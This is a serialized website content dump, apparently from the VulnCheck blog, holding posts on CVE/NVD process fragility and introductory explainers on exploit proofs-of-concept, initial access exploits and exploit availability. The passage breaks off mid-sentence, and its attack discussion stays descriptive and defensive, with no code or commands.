Fixable.",[41063],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":41065,"toc":41204},[41066,41072,41086,41089,41092,41095,41098,41102,41105,41108,41128,41132,41135,41138,41141,41144,41155,41158,41161,41164,41178,41182,41185,41188,41191,41194,41197,41200,41202],[18,41067,41068],{},[68,41069],{"alt":41070,"src":41071},"CVE Fragility","\u002Fblog\u002Fcve-fragility\u002Fcve-fragility.png",[18,41073,41074,41075,1246,41080,41085],{},"Forrester’s recent blog by ",[47,41076,41079],{"href":41077,"rel":41078},"https:\u002F\u002Fwww.forrester.com\u002Fblogs\u002Fauthor\u002Ferik_nost\u002F",[51],"Eric Nost",[47,41081,41084],{"href":41082,"rel":41083},"https:\u002F\u002Fwww.forrester.com\u002Fblogs\u002Fmitregeddon-averted-but-fragility-in-cve-processes-remain\u002F?ref_search=4510357_1747847539419",[51],"Mitregeddon Averted, But Fragility in CVE Processes Remain",", shines a much-needed spotlight on the systemic challenges facing the CVE and NVD ecosystem from the industry analyst perspective.",[18,41087,41088],{},"At VulnCheck, we understand how the increasing demand for timely, reliable, and actionable vulnerability intelligence is straining legacy processes, and we agree: the underlying fragility isn’t just a governance issue, it’s an operational challenge.",[18,41090,41091],{},"Eric’s post rightly points to the growing complexity in coordinating disclosures across a global ecosystem of vendors, researchers, coordinators, and consumers. It also calls out how uncertainty in CVE issuance and NVD publication timelines create risk, not just reputational, but operational and security-related for anyone building products or defending their organization.",[18,41093,41094],{},"This echoes exactly what we hear from our customers and partners, when CVE data is late, incomplete, or missing context, it slows down triage and hampers effective vulnerability management - it disrupts the ability to respond to threats.",[18,41096,41097],{},"What is real is this - security product teams and enterprise defenders are under increasing pressure to act fast, prioritize effectively, and reduce risk. When foundational systems like the CVE program and NVD show signs of strain, the ripple effects are immediate.",[61,41099,41101],{"id":41100},"vulnchecks-take","VulnCheck’s Take",[18,41103,41104],{},"We believe there is a path forward, one that doesn’t rely on patching over governance gaps, but instead complements existing infrastructure with faster, richer, and more contextualized intelligence.",[18,41106,41107],{},"That’s why VulnCheck continues to innovate and invest in:",[1789,41109,41110,41116,41122],{},[25,41111,41112,41115],{},[295,41113,41114],{},"Rapid Vulnerability Ingestion and Enrichment"," - we detect and process CVEs in near real-time, frequently identifying vulnerabilities before they’re fully cataloged in NVD.",[25,41117,41118,41121],{},[295,41119,41120],{},"Exploitation Context"," - VulnCheck doesn’t stop at the CVE. We layer in exploit intelligence, PoC validation, and in-the-wild observations to help teams prioritize threats based on what’s actually being weaponized.",[25,41123,41124,41127],{},[295,41125,41126],{},"Redundancy Where It Matters"," - when NVD availability faltered, VulnCheck stepped up by maintaining access to NVD 1.0 through our Community tier - and then subsequently our VulnCheck NVD++ featuring significant enrichments and API dependability This ensured continuity for the many organizations whose workflows depend on timely CVE data.",[61,41129,41131],{"id":41130},"this-is-relevant-to-product-builders-and-enterprise-response","This is Relevant to Product-builders and Enterprise Response",[18,41133,41134],{},"As Forrester notes, “the vulnerability disclosure process is, and always has been, fragile.” That fragility shows up in different ways depending on your role:",[18,41136,41137],{},"For Product Leads at cybersecurity companies - - you're building threat detection, asset management, or prioritization tools that rely on CVE and NVD as a baseline.",[18,41139,41140],{},"But when that data is delayed, incomplete, or stripped of context, your product suffers — and so does customer trust. Integrating richer exploit intelligence, better timelines, and verified evidence of exploitation gives your platform an edge in accuracy and timeliness.",[18,41142,41143],{},"What do product teams get from VulnCheck?",[22,41145,41146,41149,41152],{},[25,41147,41148],{},"Near real-time CVE ingestion and exploit PoC curration",[25,41150,41151],{},"Exploitation timelines to support risk decisions",[25,41153,41154],{},"Full-scale internet monitoring across 500+sources for complete global vulnerability and exploit intelligence on ALL CVEs to enhance your product and enable new features",[18,41156,41157],{},"What do CISOs and enterprise defenders need? First, the reliance on vulnerability intelligence to drive prioritization informs teams on what to patch, what to monitor, what to escalate.",[18,41159,41160],{},"However, when the CVE process breaks down, the NVD is backlogged, or CISA is over a month late in adding exploited vulnerabilities to its KEV, teams are left with blind spots. Worse, attackers don’t wait for the paperwork to be filed or for data to be curated - they exploit delays.",[18,41162,41163],{},"Where VulnCheck helps:",[22,41165,41166,41169,41172,41175],{},[25,41167,41168],{},"Early detection of vulnerabilities before they are analyzed by NISTe NVD",[25,41170,41171],{},"Evidence-based exploit intelligence (not just theoretical) before they hit the CISA KEV",[25,41173,41174],{},"Risk-focused enrichment to help you cut through CVE noise and prioritize what matters",[25,41176,41177],{},"Full-scale internet monitoring across 500+sources for complete global vulnerability and exploit intelligence on ALL CVEs for complete and timely visibility to enable response actioning",[61,41179,41181],{"id":41180},"building-resilience-while-speeding-up-threat-response","Building Resilience While Speeding Up Threat Response",[18,41183,41184],{},"VulnCheck supports the important role of NIST NVD, the CVE program, and the CISA KEV for that matter. However, security teams are demanding more actionable data at faster speeds to make the right decisions which is why they are turning to VulnCheck.",[18,41186,41187],{},"To that point, the objective we’re after is to reinforce these data feeds with more intelligence to help build a more robust, distributed ecosystem that balances central coordination with independent validation, augmentation and associations to emerging threat indicators.",[18,41189,41190],{},"Forrester’s blog gets this right: “we need to evolve.” We agree with Forrester: fixing the CVE\u002FNVD pipeline isn’t just about governance — it’s about resilience. And resilience comes from distribution, context, and operational redundancy.",[18,41192,41193],{},"At VulnCheck, we’re already helping the market evolve to move faster, prioritize vulnerabilities better, and maintain resiliency in the face of an increasingly chaotic vulnerability landscape.That’s why VulnCheck continues to act as both a complement and a failsafe for customers, partners and the entire cybersecurity ecosystem.",[18,41195,41196],{},"There’s a reason that over 100 cybersecurity products and thousands of consumers have either integrated VulnCheck intelligence, or ship with VulnCheck intelligence today. And our intelligence integrates directly into the workflows of some of the most sophisticated threat response workflows that help protect our critical infrastructure, national security and our global economy.",[18,41198,41199],{},"If you’re building security products or protecting a large enterprise, now’s the time to rethink your dependency on legacy processes — and lean into a model that prioritizes operational speed and exploit-informed accuracy.",[61,41201,202],{"id":201},[18,41203,40664],{},{"title":219,"searchDepth":220,"depth":220,"links":41205},[41206,41207,41208,41209],{"id":41100,"depth":220,"text":41101},{"id":41130,"depth":220,"text":41131},{"id":41180,"depth":220,"text":41181},{"id":201,"depth":220,"text":202},"2025-05-23","Forrester’s recent blog by Eric Nost, Mitregeddon Averted, But Fragility in CVE Processes Remain, shines a much-needed spotlight on the systemic challenges facing the CVE and NVD ecosystem from the industry analyst perspective.",{"slug":41213},"cve-fragility","\u002Fblog\u002Fcve-fragility",{"title":41061,"description":41211},"blog\u002Fcve-fragility","z4FtLWvrutltaUKzrvmKE649-skiejrmd0KOcs_CXOM",{"id":41219,"title":41220,"articles":7,"authors":41221,"body":41223,"date":41210,"description":41483,"extension":234,"image":7,"link":7,"meta":41484,"navigation":237,"path":41486,"seo":41487,"series":41488,"stem":41492,"subtype":7,"tags":41493,"__hash__":41495},"blog\u002Fblog\u002Funderstanding-exploit-proof-of-concept.md","Understanding Exploit Proof-of-Concept",[41222],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":41224,"toc":41471},[41225,41228,41251,41254,41257,41277,41280,41284,41287,41291,41294,41314,41318,41321,41325,41328,41331,41345,41349,41352,41363,41366,41369,41373,41376,41379,41395,41399,41402,41434,41438,41441,41461,41465,41468],[18,41226,41227],{},"This knowledge base article will give insight into:",[22,41229,41230,41233,41236,41239,41242,41245,41248],{},[25,41231,41232],{},"Definition of a Proof-of-Concept Exploit",[25,41234,41235],{},"How PoC exploits work",[25,41237,41238],{},"How the Common Vulnerability Scoring System (CVSS) uses PoC exploits",[25,41240,41241],{},"Differences between PoC and PoC exploit",[25,41243,41244],{},"Different types of PoC exploits",[25,41246,41247],{},"Exploit PoC use cases",[25,41249,41250],{},"Common exploit PoC databases",[18,41252,41253],{},"A Proof-of-Concept (PoC) exploit is published by a security researcher, and provides technical details that illustrate how cyber threat actors can leverage a vulnerability to achieve their malicious objectives. These benign attacks demonstrate the potential impact that a specific vulnerability can have on the organization’s security posture, helping vulnerability and patch management teams prioritize their remediation activities.",[18,41255,41256],{},"The key features of a PoC exploit include:",[22,41258,41259,41265,41271],{},[25,41260,41261,41264],{},[295,41262,41263],{},"Purpose",": Demonstrating a security flaw’s impact without causing harm.",[25,41266,41267,41270],{},[295,41268,41269],{},"Implementation",": Releasing the demonstration publicly.",[25,41272,41273,41276],{},[295,41274,41275],{},"Use",": Modifying risk based on how threat actors craft fully functional exploits.",[18,41278,41279],{},"Malicious actors can create fake PoC exploits to trick security teams into downloading them, attempting to execute arbitrary malicious code.",[61,41281,41283],{"id":41282},"how-do-poc-exploits-work","How Do PoC Exploits Work?",[18,41285,41286],{},"Exploit PoCs highlight the feasibility of attackers using a vulnerability to gain unauthorized access to or allow unintended actions within systems. Although intended to help prioritize applying security updates or implementing remediation measures, the public release of an exploit PoC can lead attackers to building real exploits that they use in future attacks.",[993,41288,41290],{"id":41289},"stage-1-vulnerability-identification","Stage 1: Vulnerability Identification",[18,41292,41293],{},"The vulnerability identification phase uncovers a weakness in software or systems that malicious actors could potentially use during an attack. Security researchers often use security scanners or manual techniques to identify issues, for example:",[22,41295,41296,41302,41308],{},[25,41297,41298,41301],{},[295,41299,41300],{},"Coding errors",": including vulnerable code, outdated components, or vulnerable third-party libraries.",[25,41303,41304,41307],{},[295,41305,41306],{},"Misconfigurations",": including use of default accounts and passwords, access to unnecessary features and functionality, or error handling that reveals sensitive information.",[25,41309,41310,41313],{},[295,41311,41312],{},"Design flaws",": weakness caused by insecure system architecture or logic decisions made during development.",[993,41315,41317],{"id":41316},"stage-2-vulnerability-analysis","Stage 2: Vulnerability Analysis",[18,41319,41320],{},"During this phase, researchers work to understand the vulnerability’s mechanics by looking at how it operates. Researchers analyze a vulnerability's exploitability by first understanding the underlying code and behavior that causes the issue. They examine how the input interacts with the system, identify any inherent constraints in the system, and determine the impact of manipulating that input. Static and dynamic analysis tools help them trace data flow, monitor memory access, and assess whether the flaw can lead to unauthorized actions like code execution, privilege escalation, or data leakage. In short, researchers act like attackers, using automated tools and manual processes to determine how they can use a vulnerability to compromise the application or operating system.",[993,41322,41324],{"id":41323},"stage-3-development-of-exploit-code","Stage 3: Development of Exploit Code",[18,41326,41327],{},"Once they understand the vulnerability’s mechanics, researchers can move on to build a program or script that targets the vulnerability. They exploit the vulnerability in an environment that will not cause harm to real systems, demonstrating how unauthenticated attackers could gain unauthorized access or manipulate data.",[18,41329,41330],{},"Some examples of exploit types include:",[22,41332,41333,41336,41339,41342],{},[25,41334,41335],{},"Remote code execution",[25,41337,41338],{},"Malware delivery",[25,41340,41341],{},"Relay attacks",[25,41343,41344],{},"Authentication bypass",[61,41346,41348],{"id":41347},"how-does-the-common-vulnerability-scoring-system-cvss-use-exploit-poc","How Does The Common Vulnerability Scoring System (CVSS) Use Exploit PoC?",[18,41350,41351],{},"The CVSS includes Exploit PoC under the Threat Metrics category, helping to adjust a vulnerability’s severity. The availability of proof-of-concept is one stage in measuring Exploit Maturity. Vulnerabilities are identified within CVSS as Proof-of-Concept (P) when there is credible threat intelligence showing all of the following:",[22,41353,41354,41357,41360],{},[25,41355,41356],{},"Proof-of-concept exploit code is publicly available.",[25,41358,41359],{},"No knowledge of reported attempts to exploit the vulnerability exists.",[25,41361,41362],{},"No knowledge of publicly available solutions used to simplify attempts to exploit the vulnerability exists.",[18,41364,41365],{},"The existence of an exploit PoC increases the security risk for a vulnerability because it means that attackers could use publicly available information to deploy a successful attack.",[18,41367,41368],{},"Simultaneously, since no threat intelligence indicates that attackers have used the exploit in the real world, the risk remains lower than an Attacked vulnerability which has reports of attempted or successful attacks and public exploits or privately available solutions to make exploiting the vulnerability easier.",[61,41370,41372],{"id":41371},"what-is-the-difference-between-proof-of-concept-poc-and-poc-exploit","What Is The Difference Between Proof-of-Concept (PoC) And PoC Exploit?",[18,41374,41375],{},"At a high level, PoC applies generally to any research indicating that something is possible. For example, it can be used to show that a theory could work or during the procurement process to see if a tool would work for the organization’s intended use case. Meanwhile, an exploit PoC is specific to technology security vulnerabilities to show that attackers could use the weakness to compromise systems, networks, or applications.",[18,41377,41378],{},"The three primary differences between a PoC and exploit PoC are:",[22,41380,41381,41384,41389],{},[25,41382,41383],{},"Nature: While a PoC demonstrates how a theory could work, a PoC exploit is the practical application with exploit code for using a vulnerability during an attack.",[25,41385,41386,41388],{},[295,41387,41263],{},": While a PoC shows that a vulnerability could cause risk, an exploit PoC demonstrates the method or tactic that malicious actors can use during an attack.",[25,41390,41391,41394],{},[295,41392,41393],{},"Functionality",": While a PoC lacks operational details, an exploit PoC includes modifiable code that could be used.",[61,41396,41398],{"id":41397},"what-are-some-exploit-poc-use-cases","What Are Some Exploit PoC Use Cases?",[18,41400,41401],{},"Security and vulnerability management teams can use exploit PoCs in several ways, including:",[22,41403,41404,41410,41416,41422,41428],{},[25,41405,41406,41409],{},[295,41407,41408],{},"Vulnerability assessment",": Security professionals employ the existence of PoC exploits to identify critical vulnerabilities and potential threats in a controlled setting, allowing developers to grasp the severity and mechanics of vulnerabilities.",[25,41411,41412,41415],{},[295,41413,41414],{},"Educating developers",": By demonstrating how attackers can exploit a particular vulnerability, PoCs provide a hands-on approach for engineers and researchers to learn about potential security weaknesses.",[25,41417,41418,41421],{},[295,41419,41420],{},"Security patch development",": PoC exploits help create effective mitigation strategies and security updates to defend against threat actors and arbitrary code execution.",[25,41423,41424,41427],{},[295,41425,41426],{},"Risk demonstration",": PoC exploits illustrate the feasibility of cyberattacks, facilitating a deeper understanding of what security flaws may lead to real-world exploits.",[25,41429,41430,41433],{},[295,41431,41432],{},"Research and innovation",": Security teams and researchers use PoCs to conduct experiments, prompting innovation in defensive technologies and security advisories.",[61,41435,41437],{"id":41436},"what-is-a-poc-exploit-database","What Is A PoC Exploit Database?",[18,41439,41440],{},"Exploit PoC databases offer security researchers and professionals resources to understand and mitigate vulnerabilities. Some common features across all exploit PoC databases include:",[22,41442,41443,41449,41455],{},[25,41444,41445,41448],{},[295,41446,41447],{},"Comprehensive collections",": Includes various categories, such as web apps, shells, and zero-days.",[25,41450,41451,41454],{},[295,41452,41453],{},"Verification system",": Tested exploits are marked to ensure reliability.",[25,41456,41457,41460],{},[295,41458,41459],{},"Community engagement",": Involvement from security professionals and researchers.",[61,41462,41464],{"id":41463},"vulncheck-exploit-intelligence-breadth-and-depth-of-exploit-poc-to-help-prioritize-remediation","VulnCheck Exploit Intelligence: Breadth and Depth of Exploit PoC to Help Prioritize Remediation",[18,41466,41467],{},"With VulnCheck Exploit & Vulnerability intelligence, security and vulnerability remediation teams gain access to a breadth of data that incorporates the NIST National Vulnerability Database (NVD) and CISA Known Exploited Vulnerability (KEV) catalog coupled with exploit intelligence that provides insight into real-world attacker activity.",[18,41469,41470],{},"With our Exploit Intelligence, organizations can rapidly improve their vulnerability prioritization and remediation capabilities with data about public and commercial exploits, including reported exploited, weaponized exploits, threat actors attributed with the vulnerability, ransomware campaigns using the vulnerability, and botnets attributed to the vulnerability.",{"title":219,"searchDepth":220,"depth":220,"links":41472},[41473,41478,41479,41480,41481,41482],{"id":41282,"depth":220,"text":41283,"children":41474},[41475,41476,41477],{"id":41289,"depth":1266,"text":41290},{"id":41316,"depth":1266,"text":41317},{"id":41323,"depth":1266,"text":41324},{"id":41347,"depth":220,"text":41348},{"id":41371,"depth":220,"text":41372},{"id":41397,"depth":220,"text":41398},{"id":41436,"depth":220,"text":41437},{"id":41463,"depth":220,"text":41464},"Exploit Intel 101 - Understanding Exploit Proof-of-Concept",{"slug":41485},"understanding-exploit-proof-of-concept","\u002Fblog\u002Funderstanding-exploit-proof-of-concept",{"title":41220,"description":41483},{"title":41489,"color":41490,"icon":41491},"Exploit Intelligence 101","primary","i-mdi-book-search","blog\u002Funderstanding-exploit-proof-of-concept",[41494],"101","L2wMEvWh9w7FCjBKp5aSceTwCLaV5XXe9t1IXA6nP48",{"id":41497,"title":41498,"articles":7,"authors":41499,"body":41501,"date":41210,"description":41799,"extension":234,"image":7,"link":7,"meta":41800,"navigation":237,"path":41802,"seo":41803,"series":41804,"stem":41805,"subtype":7,"tags":41806,"__hash__":41807},"blog\u002Fblog\u002Funderstanding-initial-access-exploits.md","Understanding Initial Access Exploits",[41500],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":41502,"toc":41782},[41503,41506,41526,41529,41532,41536,41545,41607,41611,41620,41624,41632,41636,41645,41649,41657,41661,41669,41673,41680,41684,41687,41695,41699,41708,41712,41720,41724,41733,41737,41740,41772,41776,41779],[18,41504,41505],{},"This knowledge base article will provide insight into:",[22,41507,41508,41511,41514,41517,41520,41523],{},[25,41509,41510],{},"Definition of an initial access exploit",[25,41512,41513],{},"Different types of techniques for gaining initial access",[25,41515,41516],{},"Examples of initial access exploits",[25,41518,41519],{},"Examples of a zero-day exploit attack",[25,41521,41522],{},"How attackers choose targets",[25,41524,41525],{},"Initial access exploit mitigations",[18,41527,41528],{},"Initial access in cybersecurity refers to the stage where an attacker first gains unauthorized access to a target network or system. Using this entry point, they can launch additional malicious activities, like lateral movement or data theft.",[18,41530,41531],{},"Attackers often gain initial access by exploiting operating system, software, and firmware vulnerabilities. The need for vendors and security researchers to publicly disclose and document vulnerabilities often makes it simple for threat actors to research and exploit the weaknesses.",[61,41533,41535],{"id":41534},"what-are-the-different-types-of-techniques-attackers-use-to-gain-initial-access","What are the Different Types of Techniques Attackers Use to Gain Initial Access?",[18,41537,41538,41539,41544],{},"Techniques, as represented in the ",[47,41540,41543],{"href":41541,"rel":41542},"https:\u002F\u002Fattack.mitre.org\u002Ftactics\u002FTA0001\u002F",[51],"MITRE ATT&CK Framework"," offer insight into the different ways that attackers can achieve their objectives. The eleven techniques listed in the Framework are:",[22,41546,41547,41553,41559,41565,41571,41577,41583,41589,41595,41601],{},[25,41548,41549,41552],{},[295,41550,41551],{},"Content Injection",": Using compromised data transfer channels to insert malicious content into systems.",[25,41554,41555,41558],{},[295,41556,41557],{},"Drive-by Compromise",": Delivering exploit code to a browser so they can gain access when a user visits a website during normal browsing.",[25,41560,41561,41564],{},[295,41562,41563],{},"Exploit Public-Facing Application",": Taking advantage of a vulnerable external-facing remote service, like virtual private network (VPN) or web application, to connect to the internal enterprise resources.",[25,41566,41567,41570],{},[295,41568,41569],{},"Hardware Additions",": Introducing computer accessories, networking hardware, or other computer devices, like a thumb drive, that act as an initial attack vector.",[25,41572,41573,41576],{},[295,41574,41575],{},"Phishing",": Sending fake emails that appear legitimate to trick users into sharing credentials or downloading malicious code with sub techniques that include Spearphishing Attachment, Spearphishing Link, Spearphishing via Service, and Spearphishing Voice.",[25,41578,41579,41582],{},[295,41580,41581],{},"Replication Through Removable Media",": Taking advantage of Autorun features to deploy malware when someone inserts the media into a system and executes, often enabling the threat actors to gain unauthorized access to disconnected or air-gapped networks.",[25,41584,41585,41588],{},[295,41586,41587],{},"Supply Chain Compromise:"," Manipulating products or product delivery mechanisms to compromise data or systems with subtechniques that include Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain, and Compromise Hardware Supply Chain.",[25,41590,41591,41594],{},[295,41592,41593],{},"Trusted Relationship",": Using a trusted third-party relationship with an established connection that may lack protection or receive less scrutiny.",[25,41596,41597,41600],{},[295,41598,41599],{},"Valid Accounts",": Obtaining and using leaked or stolen credentials for legitimate users to bypass access controls that organizations implement for remote access, like VPNs, Outlook Web Access, network devices, or remote desktop applications with subtechniques that include Default Accounts, Domain Accounts, Local Accounts, and Cloud Accounts.",[25,41602,41603,41606],{},[295,41604,41605],{},"Wi-Fi Networks",": Connecting to a target organization’s wireless networks by exploiting open Wi-Fi networks using devices or valid account credentials.",[61,41608,41610],{"id":41609},"what-are-some-examples-of-initial-access-exploits","What are Some Examples of Initial Access Exploits?",[18,41612,41613,41614,41619],{},"A wide variety of vulnerabilities can be exploited for initial access by attackers. In some cases security researchers are able to provide ",[47,41615,41618],{"href":41616,"rel":41617},"https:\u002F\u002Fdocs.vulncheck.com\u002Fkb#exploit-proof-of-concept-poc",[51],"Proof of Concept (PoC) exploits"," to help security and vulnerability management teams prioritize their remediation activities. The PoC exploits show how attackers could use a vulnerability to gain initial access. Examples include:",[993,41621,41623],{"id":41622},"beyondtrust-privileged-remote-access-remote-support-cve-2024-12356-and-cve-2025-1094","BeyondTrust Privileged Remote Access & Remote Support CVE-2024-12356 and CVE-2025-1094",[18,41625,41626,41627,41631],{},"These vulnerabilities allow unauthenticated remote code execution (RCE) in BeyondTrust products. In this ",[47,41628,2505],{"href":41629,"rel":41630},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-02-28",[51],", researchers developed pcaps to demonstrate potential risk impact of CVE-2025-1094 which was not listed in the Cybersecurity & Infrastructure security Agency (CISA) Known Exploited Vulnerability (KEV) list.",[993,41633,41635],{"id":41634},"cve-2025-33028-winzip-incorrect-propagation-of-ads-local-exploit","CVE-2025-33028: WinZip Incorrect Propagation of ADS Local Exploit",[18,41637,41638,41639,41644],{},"Researchers showed that attackers targeting ",[47,41640,41643],{"href":41641,"rel":41642},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-05-09#cve-2025-33028-winzip-incorrect-propagation-of-ads-local-exploit",[51],"vulnerable versions of WinZip"," are able to exploit this flaw to execute malicious MS Word documents or batch files.",[993,41646,41648],{"id":41647},"cve-2024-6235-citrix-netscaler-console-session-id-disclosure","CVE-2024-6235: Citrix NetScaler Console Session ID Disclosure",[18,41650,41651,41656],{},[47,41652,41655],{"href":41653,"rel":41654},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-05-02",[51],"This vulnerability"," has an Exploit Prediction Scoring System (EPSS) in the 90th percentile with NetScaler being mentioned eight times in the CISA KEV. This PoC leaks a session key and creates a super admin account to show how attackers could compromise systems.",[993,41658,41660],{"id":41659},"cve-2025-24054-windows-11-ntlmv2-hash-leak","CVE-2025-24054: Windows 11 NTLMv2 Hash Leak",[18,41662,41663,41668],{},[47,41664,41667],{"href":41665,"rel":41666},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-04-25",[51],"This vulnerability,"," listed in the CISA KEV, is triggered when a user extracts or previews a ZIP archive containing a malicious file. The PoC generates malicious payloads and demonstrates how to catch the SMB authentication request.",[993,41670,41672],{"id":41671},"cve-2024-48887-fortiswitch-unauthenticated-admin-password-reset","CVE-2024-48887: FortiSwitch Unauthenticated Admin Password Reset",[18,41674,41675,41679],{},[47,41676,41655],{"href":41677,"rel":41678},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-04-18",[51]," enables attackers to create arbitrary unauthenticated user password resets that grant a full account takeover. The PoC included an exploit, pcaps, Suricata & Snort rules, Greynoise, FOFA, Shodan, Censys, and ZoomEye queries.",[61,41681,41683],{"id":41682},"what-are-examples-of-zero-day-exploit-attacks","What are Examples Of Zero-Day Exploit Attacks?",[18,41685,41686],{},"A zero-day exploit occurs when threat actors use a previously unknown software vulnerability to gain unauthorized access to and control over systems before the manufacturer can deploy a security update. Zero-day exploits can be especially useful for initial access, as defenders have few options for remediation and there may be less security inspection than typical for a known vulnerability.",[18,41688,14080,41689,41694],{},[47,41690,41693],{"href":41691,"rel":41692},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fstate-of-exploitation-1h-2024",[51],"first half of 2024",", researchers identified 53 zero-day vulnerabilities with exploitation evidence available at or before anyone publicly disclosed the vulnerabilities. Examples include:",[993,41696,41698],{"id":41697},"four-faith-industrial-router-cve-2024-12856","Four-Faith Industrial Router CVE-2024-12856",[18,41700,41701,41702,41707],{},"Prior to publishing the vulnerability, ",[47,41703,41706],{"href":41704,"rel":41705},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Ffour-faith-cve-2024-12856?ref=blog.xlab.qianxin.com",[51],"a post-authentication vulnerability"," affecting these routers enabled attackers to leverage the device’s default credentials and engage in unauthenticated remote command injections. When modifying the device’s system time, attackers could use an OS command injection.",[993,41709,41711],{"id":41710},"cisco-ios-xe-implants-cve-2023-20198","Cisco IOS XE Implants CVE-2023-20198",[18,41713,41701,41714,41719],{},[47,41715,41718],{"href":41716,"rel":41717},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fcisco-implants",[51],"an authentication bypass vulnerability"," affecting switches and routers enabled attackers to install implants on them. With privileged access, attackers could likely monitor network traffic, pivot into protected networks, and perform various man-in-the-middle (MitM) attacks.",[61,41721,41723],{"id":41722},"how-do-attackers-choose-a-target","How Do Attackers Choose a Target?",[18,41725,41726,41727,41732],{},"Attackers typically engage in reconnaissance about an organization’s people and technology stack to gather information about vulnerabilities, network misconfigurations, and key personnel. They may choose to focus on a specific industry where organizations manage high-value sensitive data, like healthcare or financial services. They may also look to specific geographic regions if they are motivated politically. Alternately, tools such as ",[47,41728,41731],{"href":41729,"rel":41730},"https:\u002F\u002Fwww.shodan.io\u002F",[51],"Shodan"," or honey pots allow attackers to identify opportunistic targets.",[61,41734,41736],{"id":41735},"what-are-some-initial-access-exploit-mitigation-steps-organizations-can-take","What are Some Initial Access Exploit Mitigation Steps Organizations Can Take?",[18,41738,41739],{},"Many cybersecurity best practices are focused on stopping or limiting the impact of initial access. To mitigate the risk that attackers can gain or weaponize initial access, organizations should consider the following security controls:",[22,41741,41742,41748,41754,41760,41766],{},[25,41743,41744,41747],{},[295,41745,41746],{},"Multi-factor authentication (MFA)",": Leveraging authenticator apps or security challenge prompts at authentication time helps to ensure users are who they say they are when accessing critical resources.",[25,41749,41750,41753],{},[295,41751,41752],{},"Principle of least privilege:"," Limit user access as precisely as possible so users can access only the resources necessary to complete their job functions to mitigate risks of unauthorized users moving laterally across systems.",[25,41755,41756,41759],{},[295,41757,41758],{},"Secure software configurations",": Change default credentials on commercial products and limit software and hardware functionality.",[25,41761,41762,41765],{},[295,41763,41764],{},"Vulnerability management",": Identify vulnerabilities across devices, software, and firmware then apply security updates or implement compensating controls as quickly as possible.",[25,41767,41768,41771],{},[295,41769,41770],{},"Detection and Response",": Implement detections, like Suricata or YARA rules, and leverage detection and response systems across the network, endpoint, and cloud to alert security teams about potential incidents.",[61,41773,41775],{"id":41774},"vulncheck-exploit-intelligence-insight-into-ongoing-and-potential-vulnerability-exploits","VulnCheck Exploit Intelligence: Insight Into Ongoing and Potential Vulnerability Exploits",[18,41777,41778],{},"As the organization’s attack surface expands, identifying anomalous activity and malicious activity becomes more difficult. With VulnCheck Exploit & Vulnerability intelligence, security and vulnerability remediation teams gain access to a breadth of data that incorporates the NIST National Vulnerability Database (NVD) and CISA Known Exploited Vulnerability (KEV) catalog coupled with exploit intelligence that provides insight into real-world attacker activity.",[18,41780,41781],{},"With our Exploit Intelligence that provides initial access intelligence, organizations can rapidly improve their vulnerability prioritization and remediation capabilities with data about public and commercial exploits, including reported exploited, weaponized exploits, threat actors attributed with the vulnerability, ransomware campaigns using the vulnerability, and botnets attributed to the vulnerability.",{"title":219,"searchDepth":220,"depth":220,"links":41783},[41784,41785,41792,41796,41797,41798],{"id":41534,"depth":220,"text":41535},{"id":41609,"depth":220,"text":41610,"children":41786},[41787,41788,41789,41790,41791],{"id":41622,"depth":1266,"text":41623},{"id":41634,"depth":1266,"text":41635},{"id":41647,"depth":1266,"text":41648},{"id":41659,"depth":1266,"text":41660},{"id":41671,"depth":1266,"text":41672},{"id":41682,"depth":220,"text":41683,"children":41793},[41794,41795],{"id":41697,"depth":1266,"text":41698},{"id":41710,"depth":1266,"text":41711},{"id":41722,"depth":220,"text":41723},{"id":41735,"depth":220,"text":41736},{"id":41774,"depth":220,"text":41775},"Exploit Intel 101 - Understanding Initial Access Exploits",{"slug":41801},"understanding-initial-access-exploits","\u002Fblog\u002Funderstanding-initial-access-exploits",{"title":41498,"description":41799},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-initial-access-exploits",[41494],"3OKwZX4s0QGSGEHkZBS_T_T6tGyk-V3CrLP3W2csyq4",{"id":41809,"title":41810,"articles":7,"authors":41811,"body":41813,"date":42074,"description":42075,"extension":234,"image":7,"link":7,"meta":42076,"navigation":237,"path":42078,"seo":42079,"series":42080,"stem":42081,"subtype":7,"tags":42082,"__hash__":42083},"blog\u002Fblog\u002Funderstanding-exploit-availability.md","Understanding Exploit Availability",[41812],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":41814,"toc":42061},[41815,41817,41831,41835,41838,41876,41879,41882,41886,41895,41909,41912,41932,41936,41939,41942,41961,41964,41975,41979,41982,41985,42005,42008,42019,42023,42026,42030,42033,42037,42040,42044,42047,42051,42054,42058],[18,41816,41227],{},[22,41818,41819,41822,41825,41828],{},[25,41820,41821],{},"The definition of exploitability and the factors that affect a vulnerability’s exploitability",[25,41823,41824],{},"The definition of exploit availability",[25,41826,41827],{},"What the Known Exploited Vulnerability (KEV) catalog is",[25,41829,41830],{},"Exploit availability’s importance and challenges that security teams face",[61,41832,41834],{"id":41833},"what-is-the-meaning-of-exploitability","What is the Meaning of Exploitability?",[18,41836,41837],{},"Exploitability refers to the potential or likelihood that threat actors can use a vulnerability to compromise systems, applications, or networks. When assessing exploitability, security professionals consider whether attackers can easily use the vulnerability to achieve their objectives, accounting for factors like:",[22,41839,41840,41846,41852,41858,41864,41870],{},[25,41841,41842,41845],{},[295,41843,41844],{},"Complexity of system architecture",": Complex systems require more advanced attacker expertise, influencing ease of exploitation.",[25,41847,41848,41851],{},[295,41849,41850],{},"Existence of Exploit Code",": Verified and popular exploit code, especially if linked extensively in common repositories, increases the chances of exploitation.",[25,41853,41854,41857],{},[295,41855,41856],{},"Threat Actor Skill Level",": The expert status of threat actors can determine how vulnerabilities are exploited.",[25,41859,41860,41863],{},[295,41861,41862],{},"Exploit Timelines",": The median time from disclosure to exploitation may vary, affected by exploit difficulty and 